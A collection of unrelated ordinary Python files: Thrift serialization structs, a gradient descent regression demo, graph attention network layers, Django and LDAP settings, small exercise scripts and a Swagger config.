TUpdateFilterParams: """ Attributes: - protocol_version - filter_id - query_id - bloom_filter - min_max_filter """ thrift_spec = ( None, # 0 (1, TType.I32, 'protocol_version', None, None, ), # 1 (2, TType.I32, 'filter_id', None, None, ), # 2 (3, TType.STRUCT, 'query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 3 (4, TType.STRUCT, 'bloom_filter', (TBloomFilter, TBloomFilter.thrift_spec), None, ), # 4 (5, TType.STRUCT, 'min_max_filter', (TMinMaxFilter, TMinMaxFilter.thrift_spec), None, ), # 5 ) def __init__(self, protocol_version=None, filter_id=None, query_id=None, bloom_filter=None, min_max_filter=None,): self.protocol_version = protocol_version self.filter_id = filter_id self.query_id = query_id self.bloom_filter = bloom_filter self.min_max_filter = min_max_filter def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, 
iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.protocol_version = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.filter_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.query_id = Types.ttypes.TUniqueId() self.query_id.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRUCT: self.bloom_filter = TBloomFilter() self.bloom_filter.read(iprot) else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRUCT: self.min_max_filter = TMinMaxFilter() self.min_max_filter.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TUpdateFilterParams') if self.protocol_version is not None: oprot.writeFieldBegin('protocol_version', TType.I32, 1) oprot.writeI32(self.protocol_version) oprot.writeFieldEnd() if self.filter_id is not None: oprot.writeFieldBegin('filter_id', TType.I32, 2) oprot.writeI32(self.filter_id) oprot.writeFieldEnd() if self.query_id is not None: oprot.writeFieldBegin('query_id', TType.STRUCT, 3) self.query_id.write(oprot) oprot.writeFieldEnd() if self.bloom_filter is not None: oprot.writeFieldBegin('bloom_filter', TType.STRUCT, 4) self.bloom_filter.write(oprot) oprot.writeFieldEnd() if self.min_max_filter is not None: oprot.writeFieldBegin('min_max_filter', TType.STRUCT, 5) self.min_max_filter.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.protocol_version is None: raise TProtocol.TProtocolException(message='Required field protocol_version is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TUpdateFilterResult: thrift_spec = ( ) def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TUpdateFilterResult') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TPublishFilterParams: """ Attributes: - 
protocol_version - filter_id - dst_query_id - dst_fragment_idx - bloom_filter - min_max_filter """ thrift_spec = ( None, # 0 (1, TType.I32, 'protocol_version', None, None, ), # 1 (2, TType.I32, 'filter_id', None, None, ), # 2 (3, TType.STRUCT, 'dst_query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 3 (4, TType.I32, 'dst_fragment_idx', None, None, ), # 4 (5, TType.STRUCT, 'bloom_filter', (TBloomFilter, TBloomFilter.thrift_spec), None, ), # 5 (6, TType.STRUCT, 'min_max_filter', (TMinMaxFilter, TMinMaxFilter.thrift_spec), None, ), # 6 ) def __init__(self, protocol_version=None, filter_id=None, dst_query_id=None, dst_fragment_idx=None, bloom_filter=None, min_max_filter=None,): self.protocol_version = protocol_version self.filter_id = filter_id self.dst_query_id = dst_query_id self.dst_fragment_idx = dst_fragment_idx self.bloom_filter = bloom_filter self.min_max_filter = min_max_filter def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.protocol_version = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.filter_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.dst_query_id = Types.ttypes.TUniqueId() self.dst_query_id.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.I32: self.dst_fragment_idx = iprot.readI32(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.STRUCT: self.bloom_filter = TBloomFilter() self.bloom_filter.read(iprot) else: iprot.skip(ftype) elif fid == 6: if ftype == TType.STRUCT: self.min_max_filter = TMinMaxFilter() self.min_max_filter.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TPublishFilterParams') if self.protocol_version is not None: oprot.writeFieldBegin('protocol_version', TType.I32, 1) oprot.writeI32(self.protocol_version) oprot.writeFieldEnd() if self.filter_id is not None: oprot.writeFieldBegin('filter_id', TType.I32, 2) oprot.writeI32(self.filter_id) oprot.writeFieldEnd() if self.dst_query_id is not None: oprot.writeFieldBegin('dst_query_id', TType.STRUCT, 3) self.dst_query_id.write(oprot) oprot.writeFieldEnd() if self.dst_fragment_idx is not None: oprot.writeFieldBegin('dst_fragment_idx', TType.I32, 4) oprot.writeI32(self.dst_fragment_idx) oprot.writeFieldEnd() if self.bloom_filter is not None: oprot.writeFieldBegin('bloom_filter', TType.STRUCT, 5) self.bloom_filter.write(oprot) oprot.writeFieldEnd() if self.min_max_filter is not None: oprot.writeFieldBegin('min_max_filter', TType.STRUCT, 6) self.min_max_filter.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.protocol_version is None: raise TProtocol.TProtocolException(message='Required field protocol_version is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in 
self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TPublishFilterResult: thrift_spec = ( ) def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TPublishFilterResult') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other)
nilq/baby-python
python
# Linear regression via gradient descent
# Regression equation: y = w1 * x + w0 * 1
# Expressed in matrix form: y = [w1, w0] * [x, 1]T
# Goal: use gradient descent on the sample data, iterating repeatedly to
# obtain the best w0, w1, which give the target equation.

# Data: [x, y] samples
bread_price = [[0.5, 5], [0.6, 5.5], [0.8, 6], [1.1, 6.8], [1.4, 7]]

# Perform one update of w0, w1 using BGD (Batch Gradient Descent)
def BGD_step_gradient(w0_current, w1_current, points, learning_rate):
    w0_gradient = 0
    w1_gradient = 0
    # Loop over all samples to accumulate grad(w0), grad(w1):
    # grad(Wi) = -1 * sum((target(d) - output(d)) * Xi(d))
    # Xi(d) is the input paired with Wi, e.g. x for w1 and 1 for w0.
    for i in range(len(points)):
        x = points[i][0]
        y = points[i][1]
        # accumulate the current gradient
        w0_gradient += -1.0 * (y - ((w1_current * x) + w0_current))
        w1_gradient += -1.0 * x * (y - ((w1_current * x) + w0_current))
    # Wi <-- Wi + n * sum((target(d) - output(d)) * Xi(d)), where n is the learning rate
    new_w0 = w0_current - (learning_rate * w0_gradient)
    new_w1 = w1_current - (learning_rate * w1_gradient)
    return [new_w0, new_w1]

# Gradient descent driver
def gradient_descent_runner(points, start_w0, start_w1, l_rate, num_iterations):
    w0 = start_w0
    w1 = start_w1
    for i in range(num_iterations):
        w0, w1 = BGD_step_gradient(w0, w1, points, l_rate)
    return [w0, w1]

def predict(w0, w1, wheat):
    price = w1 * wheat + w0
    return price

if __name__ == "__main__":
    learning_rate = 0.01  # learning rate
    num_iter = 100  # number of iterations
    w0, w1 = gradient_descent_runner(bread_price, 1, 1, learning_rate, num_iter)
    price = predict(w0, w1, 0.9)  # predict the price of 0.9 pounds of bread
    print("price = ", price)
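# A quick cross-check on the update rule above (added for illustration, not
# part of the original script): ordinary least squares has a closed-form
# solution, so numpy.polyfit fitted on the same data should agree with what
# gradient descent converges to. NumPy is assumed to be available.
import numpy as np

def closed_form_fit(points):
    # polyfit with degree 1 returns [w1, w0] minimizing sum((y - (w1*x + w0))**2)
    xs = np.array([p[0] for p in points])
    ys = np.array([p[1] for p in points])
    w1, w0 = np.polyfit(xs, ys, 1)
    return w0, w1

if __name__ == "__main__":
    w0_gd, w1_gd = gradient_descent_runner(bread_price, 1, 1, 0.01, 10000)
    w0_ls, w1_ls = closed_form_fit(bread_price)
    print("gradient descent: w0=%.4f w1=%.4f" % (w0_gd, w1_gd))
    print("closed form:      w0=%.4f w1=%.4f" % (w0_ls, w1_ls))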
nilq/baby-python
python
#!/usr/bin/env python3 import glooey import pyglet pyglet.font.add_file('Lato-Regular.ttf') pyglet.font.load('Lato Regular') class WesnothLabel(glooey.Label): custom_font_name = 'Lato Regular' custom_font_size = 10 custom_color = '#b9ad86' custom_alignment = 'center' window = pyglet.window.Window() gui = glooey.Gui(window) label = WesnothLabel('Hello world!') gui.add(label) pyglet.app.run()
nilq/baby-python
python
import numpy as np import torch import torch.nn as nn import torch.nn.functional as F class Norm(nn.Module): """ Graph Normalization """ def __init__(self, norm_type, hidden_dim=64): super().__init__() if norm_type == 'bn': self.norm = nn.BatchNorm1d(hidden_dim) elif norm_type == 'gn': self.norm = norm_type self.weight = nn.Parameter(torch.ones(hidden_dim)) self.bias = nn.Parameter(torch.zeros(hidden_dim)) self.mean_scale = nn.Parameter(torch.ones(hidden_dim)) def compute_norm(self,x,dim=0): eps = 1e-6 mean = x.mean(dim = dim, keepdim = True) var = x.std(dim = dim, keepdim = True) x = (x - mean) / (var + eps) return x def forward(self, x): if self.norm is not None and type(self.norm) != str: x_norm = [] for i in range(x.size(0)): x_norm.append(self.compute_norm(self.compute_norm(x[i,:,:],dim=1),dim=0).unsqueeze(0)) x = torch.cat(x_norm,dim=0) return x elif self.norm is None: return x bs, k, c = x.size() batch_list = torch.tensor(1).repeat(bs).long().to(x.device) batch_index = torch.arange(bs).to(x.device).repeat_interleave(batch_list) batch_index = batch_index.view((-1,) + (1,) * (x.dim() - 1)).expand_as(x) mean = torch.zeros(bs, *x.shape[1:]).to(x.device) mean = mean.scatter_add_(0, batch_index, x) mean = (mean.T / batch_list).T mean = mean.repeat_interleave(batch_list, dim=0) sub = x - mean * self.mean_scale std = torch.zeros(bs, *x.shape[1:]).to(x.device) std = std.scatter_add_(0, batch_index, sub.pow(2)) std = ((std.T / batch_list).T + 1e-6).sqrt() std = std.repeat_interleave(batch_list, dim=0) x_norm = self.weight * sub / std + self.bias return x_norm class GraphEncoderDecoderAttention(nn.Module): def __init__(self, nhid, nheads, dropout, norm_type='bn', alpha=0.1, decoder_attn='ctx'): super(GraphEncoderDecoderAttention, self).__init__() self.dropout = dropout self.nhid = nhid self.nheads = nheads self.graph_attentions = [GraphEncoderDecoderAttentionLayer(nhid, nhid, nhid//nheads, dropout=dropout, alpha=alpha, concat=True) for _ in range(nheads)] for i, attention in enumerate(self.graph_attentions): self.add_module('attention_{}'.format(i), attention) self.linear = nn.Linear(nhid, nhid) self.norm1 = Norm(norm_type,nhid) self.norm2 = Norm(norm_type,nhid) self.activation = F.leaky_relu self.graph_multihead_attn = nn.MultiheadAttention(nhid, nheads, dropout=dropout) self.decoder_attention = decoder_attn def forward(self, x, ctx_with_pos, ctx,src, adj): x = F.dropout(x, self.dropout) ctx = F.dropout(ctx, self.dropout) x = x + torch.cat([att(x,ctx_with_pos,adj) for att in self.graph_attentions],dim=2) x = self.linear(self.norm1(x)) x = F.dropout(x,self.dropout) x = self.norm2(x) x = x.permute(1,0,2) ctx_with_pos = ctx_with_pos.permute(1,0,2) ctx = ctx.permute(1,0,2) x = self.graph_multihead_attn(x,ctx_with_pos,value=ctx)[0] x = x.permute(1,0,2) return x class GraphSelfAttention(nn.Module): def __init__(self, nhid, nheads, dropout, norm_type='bn', alpha=0.1): """Dense version of GAT.""" super(GraphSelfAttention, self).__init__() self.dropout = dropout self.nhid = nhid self.nheads = nheads self.graph_attentions = [GraphAttentionLayer(nhid, nhid//nheads, dropout=dropout, alpha=alpha, concat=True) for _ in range(nheads)] for i, attention in enumerate(self.graph_attentions): self.add_module('attention_{}'.format(i), attention) self.linear = nn.Linear(nhid, nhid) self.graph_self_attn = nn.MultiheadAttention(nhid, nheads, dropout=dropout) self.norm1 = Norm(norm_type,nhid) self.norm2 = Norm(norm_type,nhid) self.activation = F.leaky_relu def forward(self, x, src, adj): x = F.dropout(x, 
self.dropout) x_att = [] e_att = [] for att in self.graph_attentions: node,edge = att(x,adj) x_att.append(node) e_att.append(edge) x = x + torch.cat(x_att,dim=2) e = torch.sum(torch.stack(e_att),dim=0)/len(x_att) x = self.linear(self.norm1(x)) x = F.dropout(x,self.dropout) x = self.norm2(x) x = x.permute(1,0,2) x = self.graph_self_attn(x,x,value=src)[0] x = x.permute(1,0,2) return x, e class GraphEncoderDecoderAttentionLayer(nn.Module): """ Graph-to-Graph message passing, adapted from https://arxiv.org/abs/1710.10903 """ def __init__(self, in_src_features, in_tgt_features, out_features, dropout, alpha, concat=True): super(GraphEncoderDecoderAttentionLayer, self).__init__() self.dropout = dropout self.in_src_features = in_src_features self.in_tgt_features = in_tgt_features self.out_features = out_features self.alpha = alpha self.concat = concat self.Ws = nn.Parameter(torch.empty(size=(in_src_features, out_features))) self.Wt = nn.Parameter(torch.empty(size=(in_tgt_features, out_features))) nn.init.xavier_uniform_(self.Ws.data, gain=1.414) nn.init.xavier_uniform_(self.Wt.data, gain=1.414) self.a = nn.Parameter(torch.empty(size=(2*out_features, 1))) nn.init.xavier_uniform_(self.a.data, gain=1.414) self.leakyrelu = nn.LeakyReLU(self.alpha) def forward(self, h, ctx, adj): Ws_ctx = torch.bmm(ctx, self.Ws.repeat(ctx.size(0),1,1)) Wt_h = torch.bmm(h, self.Wt.repeat(h.size(0),1,1)) a_input = self._prepare_attentional_mechanism_input(Ws_ctx, Wt_h) e = self.leakyrelu(torch.matmul(a_input, self.a).squeeze(3)) zero_vec = -9e15*torch.ones_like(e) attention = torch.where(adj > 0, e, zero_vec) attention = F.softmax(attention, dim=2) attention = F.dropout(attention, self.dropout, training=self.training) h_prime = torch.matmul(attention, Ws_ctx) h_prime = F.leaky_relu(h_prime) return h_prime def _prepare_attentional_mechanism_input(self, Ws_ctx, Wt_h): Ns = Ws_ctx.size()[1] # number of nodes Nt = Wt_h.size()[1] # number of nodes # Below, two matrices are created that contain embeddings in their rows in different orders. # (e stands for embedding) # These are the rows of the first matrix (Wh_repeated_in_chunks): # e1, e1, ..., e1, e2, e2, ..., e2, ..., eN, eN, ..., eN # '-------------' -> N times '-------------' -> N times '-------------' -> N times # # These are the rows of the second matrix (Wh_repeated_alternating): # e1, e2, ..., eN, e1, e2, ..., eN, ..., e1, e2, ..., eN # '----------------------------------------------------' -> N times # Ws_ctx_repeated_in_chunks = Ws_ctx.repeat_interleave(Nt, dim=1) Wt_h_repeated_alternating = Wt_h.repeat([1,Ns,1]) # Wh_repeated_in_chunks.shape == Wh_repeated_alternating.shape == (N * N, out_features) # The all_combination_matrix, created below, will look like this (|| denotes concatenation): # e1 || e1 # e1 || e2 # e1 || e3 # ... # e1 || eN # e2 || e1 # e2 || e2 # e2 || e3 # ... # e2 || eN # ... # eN || e1 # eN || e2 # eN || e3 # ... 
# eN || eN all_combinations_matrix = torch.cat([Ws_ctx_repeated_in_chunks, Wt_h_repeated_alternating], dim=2) return all_combinations_matrix.view(Ws_ctx.size(0),Nt, Ns, 2 * self.out_features) class GraphAttentionLayer(nn.Module): """ Simple GAT layer, similar to https://arxiv.org/abs/1710.10903 """ def __init__(self, in_features, out_features, dropout, alpha, concat=True): super(GraphAttentionLayer, self).__init__() self.dropout = dropout self.in_features = in_features self.out_features = out_features self.alpha = alpha self.concat = concat self.W = nn.Parameter(torch.empty(size=(in_features, out_features))) nn.init.xavier_uniform_(self.W.data, gain=1.414) self.a = nn.Parameter(torch.empty(size=(2*out_features, 1))) nn.init.xavier_uniform_(self.a.data, gain=1.414) self.leakyrelu = nn.LeakyReLU(self.alpha) def forward(self, h, adj): Wh = torch.bmm(h, self.W.repeat(h.size(0),1,1)) a_input = self._prepare_attentional_mechanism_input(Wh) e = self.leakyrelu(torch.matmul(a_input, self.a).squeeze(3)) zero_vec = -9e15*torch.ones_like(e) attention = torch.where(adj > 0, e, zero_vec.to(h.device)) attention = F.softmax(attention, dim=2) attention = F.dropout(attention, self.dropout, training=self.training) h_prime = torch.matmul(attention, Wh) h_prime = F.leaky_relu(h_prime) return h_prime, attention def _prepare_attentional_mechanism_input(self, Wh): N = Wh.size()[1] # number of nodes # Below, two matrices are created that contain embeddings in their rows in different orders. # (e stands for embedding) # These are the rows of the first matrix (Wh_repeated_in_chunks): # e1, e1, ..., e1, e2, e2, ..., e2, ..., eN, eN, ..., eN # '-------------' -> N times '-------------' -> N times '-------------' -> N times # # These are the rows of the second matrix (Wh_repeated_alternating): # e1, e2, ..., eN, e1, e2, ..., eN, ..., e1, e2, ..., eN # '----------------------------------------------------' -> N times # Wh_repeated_in_chunks = Wh.repeat_interleave(N, dim=1) Wh_repeated_alternating = Wh.repeat([1,N,1]) # Wh_repeated_in_chunks.shape == Wh_repeated_alternating.shape == (N * N, out_features) # The all_combination_matrix, created below, will look like this (|| denotes concatenation): # e1 || e1 # e1 || e2 # e1 || e3 # ... # e1 || eN # e2 || e1 # e2 || e2 # e2 || e3 # ... # e2 || eN # ... # eN || e1 # eN || e2 # eN || e3 # ... # eN || eN all_combinations_matrix = torch.cat([Wh_repeated_in_chunks, Wh_repeated_alternating], dim=2) return all_combinations_matrix.view(Wh.size(0), N, N, 2 * self.out_features)
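# The repeat_interleave / repeat trick documented in the comments above is
# easiest to see on a toy tensor. This demo (added for illustration, not part
# of the module; it reuses the module-level torch import) builds the N*N
# pairwise ordering for N = 3 scalar "embeddings": pairs[i][j] holds (e_i, e_j),
# exactly the e_i || e_j layout described above.
if __name__ == '__main__':
    Wh = torch.arange(1, 4, dtype=torch.float32).view(1, 3, 1)  # batch of N=3 nodes
    chunks = Wh.repeat_interleave(3, dim=1)  # e1 e1 e1 e2 e2 e2 e3 e3 e3
    alternating = Wh.repeat([1, 3, 1])       # e1 e2 e3 e1 e2 e3 e1 e2 e3
    pairs = torch.cat([chunks, alternating], dim=2).view(3, 3, 2)
    print(pairs)  # pairs[i][j] == (e_i, e_j)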
nilq/baby-python
python
import ldap
import os

BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

ARCHIVE_API = {
    'DATASET_ARCHIVE_ROOT': os.getenv('DATASET_ARCHIVE_ROOT', os.path.join(BASE_DIR, 'archives')),
    'DATASET_ARCHIVE_URL': '/archives/',  # not used
    'DATASET_ADMIN_MAX_UPLOAD_SIZE': 2147483648,  # in bytes
    'DATASET_USER_MAX_UPLOAD_SIZE': 1073741824,  # in bytes
    'EMAIL_NGEET_TEAM': (os.getenv('EMAIL_NGEET_TEAM'),),
    'EMAIL_SUBJECT_PREFIX': os.getenv('EMAIL_SUBJECT_PREFIX', '[ngt-archive]')
}

GOOGLE_MAPS_KEY = os.getenv('GOOGLE_MAPS_KEY')

FILE_UPLOAD_PERMISSIONS = 0o660
FILE_UPLOAD_TEMP_DIR = os.path.join(os.getenv('FILE_UPLOAD_TEMP_DIR', '/tmp'))

EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.lbl.gov'
EMAIL_PORT = 25
DEFAULT_FROM_EMAIL = 'NGEE Tropics Archive <no-reply@ngt-dev.lbl.gov>'

# django app running behind a reverse proxy
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
USE_X_FORWARDED_HOST = True
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True

# Uncomment for Production (using a reverse proxy)
DEBUG = False
ALLOWED_HOSTS = ['*']

# A list of all the people who get code error notifications. When DEBUG=False
# and a view raises an exception, Django will email these people with the full
# exception information. Each item in the list should be a tuple of (Full name,
# email address).
ADMINS = (('NGEE Tropics Admin', os.getenv('ADMIN_EMAIL')),)

# A list in the same format as ADMINS that specifies who should get broken
# link notifications.
MANAGERS = ADMINS

SECRET_KEY = os.getenv('SECRET_KEY', None)

# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': os.getenv('SQL_ENGINE', 'django.db.backends.sqlite3'),
        'NAME': os.getenv('SQL_DATABASE', os.path.join(BASE_DIR, 'db.sqlite3')),
        'USER': os.getenv('SQL_USER', 'wfsfa'),
        'PASSWORD': os.getenv('SQL_PASSWORD', 'password'),
        'HOST': os.getenv('SQL_HOST', 'localhost'),
        'PORT': os.getenv('SQL_PORT', '5432'),
    }
}

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_ROOT = os.getenv('STATIC_ROOT', 'static/')
STATIC_URL = '/static/'
STATICFILES_DIRS = ()

#####################
# LDAP configuration
#####################
AUTH_LDAP_SERVER_URI = os.getenv('AUTH_LDAP_SERVER_URI')
AUTH_LDAP_CONNECTION_OPTIONS = {
    ldap.OPT_REFERRALS: 0
}

from django_auth_ldap.config import LDAPSearch

AUTH_LDAP_BIND_DN = os.getenv('AUTH_LDAP_BIND_DN')
AUTH_LDAP_BIND_PASSWORD = os.getenv('AUTH_LDAP_BIND_PASSWORD')
AUTH_LDAP_USER_SEARCH = LDAPSearch(os.getenv('AUTH_LDAP_USER_SEARCH'),
                                   ldap.SCOPE_SUBTREE,
                                   "(&(objectClass=user)(sAMAccountName=%(user)s))")
AUTH_LDAP_CACHE_GROUPS = True
AUTH_LDAP_GROUP_CACHE_TIMEOUT = 300
AUTH_LDAP_USER_ATTR_MAP = {
    "first_name": "givenName",
    "last_name": "sn",
    "email": "mail"
}

# Keep ModelBackend around for per-user permissions and maybe a local
# superuser.
AUTHENTICATION_BACKENDS = (
    'archive_api.backends.LDAPBackend',
    'archive_api.backends.ModelBackend',
    'archive_api.backends.OAuth2Backend',
)
nilq/baby-python
python
from django.conf.urls import url
from ClassView import views
from ClassView.views import check_ip

urlpatterns = [
    # Option 1: apply the decorator directly in the URL conf
    # url(r'^post2$', check_ip(views.PostView.as_view())),
    url(r'^post2$', views.PostView.as_view()),
    url(r'^index$', views.index),
    url(r'^block$', views.block)
]
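# Option 2, shown for contrast (an illustrative sketch, not this project's
# actual code; views normally live in views.py rather than the URL conf): the
# same decorator can be attached inside the class with method_decorator,
# keeping the URL conf free of wrappers. The response body below is made up.
from django.http import HttpResponse
from django.utils.decorators import method_decorator
from django.views import View

@method_decorator(check_ip, name='dispatch')
class DecoratedPostView(View):
    def post(self, request):
        return HttpResponse('ok')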
nilq/baby-python
python
#BookStore
class Book:
    def __init__(self, pages, price, author, id1, title):
        self.pages = pages
        self.price = price
        self.author = author
        self.id1 = id1
        self.title = title

class BookStore:
    def __init__(self, book_store_name, book_list):
        self.book_list = book_list
        self.book_store_name = book_store_name

    def find_minimum_team_by_Id(self):
        # return the book with the smallest id, or None if the store is empty
        minim = 999999
        obj = None
        for each in self.book_list:
            if each.id1 < minim:
                minim = each.id1
                obj = each
        return obj

    def sort_book_by_Id(self):
        # return the book ids in ascending order, or None if there are no books
        l = []
        for each in self.book_list:
            l.append(each.id1)
        return sorted(l) if len(l) != 0 else None

n = int(input())
l = []
for i in range(n):
    pages = int(input())
    price = int(input())
    author = input()
    id1 = int(input())
    title = input()
    l.append(Book(pages, price, author, id1, title))
obj = BookStore("", l)
x = obj.find_minimum_team_by_Id()
if x == None:
    print("No Data Found")
else:
    print(x.pages)
    print(x.price)
    print(x.author)
    print(x.id1)
    print(x.title)
y = obj.sort_book_by_Id()
if y == None:
    print("No Data Found")
else:
    for i in y:
        print(i)
nilq/baby-python
python
import math

def area_circle(r):
    area = math.pi * (r ** 2)
    return area

def volume_sphere(r):
    volume = ((4 / 3) * math.pi) * (r ** 3)
    return volume

#MAIN
radius = float(input("Enter a radius:"))

#call the area function and print the result
circle_area = area_circle(radius)
print(f'The area of the circle is {circle_area:.2f}')

#call the volume function and print the result
sphere_volume = volume_sphere(radius)
print(f'The volume of the sphere is {sphere_volume:.2f}')
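# Worked check (appended for illustration; it runs after the interactive demo
# above): for r = 2 the formulas give area = pi * 2**2 = 4*pi ~= 12.57 and
# volume = (4/3) * pi * 2**3 = (32/3)*pi ~= 33.51.
assert abs(area_circle(2.0) - 4 * math.pi) < 1e-9
assert abs(volume_sphere(2.0) - (32 / 3) * math.pi) < 1e-9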
nilq/baby-python
python
# -*- coding: utf-8 -*- """Flask extensions that can be lazily accessed before instantiation of the web application.""" from flasgger import Swagger from flask_sqlalchemy import SQLAlchemy from embeddingdb.version import VERSION __all__ = [ 'db', 'swagger', ] db = SQLAlchemy() swagger_config = Swagger.DEFAULT_CONFIG.copy() swagger_config.update({ 'title': 'Embedding Database API', 'description': 'This exposes the functions of embeddingdb as a RESTful API', 'contact': { 'responsibleOrganization': 'Fraunhofer SCAI', 'responsibleDeveloper': 'Charles Tapley Hoyt', 'email': 'charles.hoyt@scai.fraunhofer.de', 'url': 'https://www.scai.fraunhofer.de/de/geschaeftsfelder/bioinformatik.html', }, 'version': VERSION, 'specs_route': '/' }) swagger = Swagger(config=swagger_config)
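# Typical wiring for the lazily-created extensions above, sketched for
# illustration: a minimal application factory initializes both extensions
# against a concrete Flask app. The create_app function and the sqlite URI
# are assumptions, not part of this module.
from flask import Flask

def create_app():
    app = Flask(__name__)
    app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite://'  # in-memory DB for the sketch
    db.init_app(app)
    swagger.init_app(app)
    return app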
nilq/baby-python
python
# Copyright (c) 2014-2016, Intel Corporation All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED # TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A # PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED # TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN 